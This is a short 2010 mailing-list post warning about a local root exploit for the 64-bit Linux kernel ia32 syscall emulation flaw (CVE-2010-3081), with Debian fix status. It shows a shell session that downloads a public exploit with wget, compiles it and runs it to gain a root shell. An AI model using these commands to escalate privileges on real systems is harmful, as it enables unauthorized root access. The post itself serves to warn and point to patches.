[SR-Users] [OT] Local root exploit for the x86_64 Linux kernel ia32syscall emulation vulnerability
Iñaki Baz Castillo
ibc at aliax.net
Thu Oct 14 02:19:37 CEST 2010
In any Linux Kernel 64 bits < 2.6.36-rc4:
--------------------------------------------
ibc at myserver :/tmp$ whoami
ibc
ibc at myserver:/tmp$ wget
http://packetstormsecurity.org/1009-exploits/robert_you_suck.c
ibc at myserver:/tmp$ gcc -o putada robert_you_suck.c
ibc at myserver:/tmp$ ./putada
resolved symbol commit_creds to 0xffffffff81092120
resolved symbol prepare_kernel_cred to 0xffffffff81091fa0
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
sh-3.2# whoami
root <----------- OPSSSS !!!
--------------------------------------------
More info:
http://packetstormsecurity.org/filedesc/robert_you_suck.c.html
Fixed in Debian (kernel patch backported):
http://security-tracker.debian.org/tracker/CVE-2010-3081
- lenny (security) 2.6.26-25lenny1 fixed
- lenny-backports 2.6.32-23~bpo50+1 fixed
- squeeze 2.6.32-23 fixed
--
Iñaki Baz Castillo
<ibc at aliax.net>
More information about the sr-users
mailing list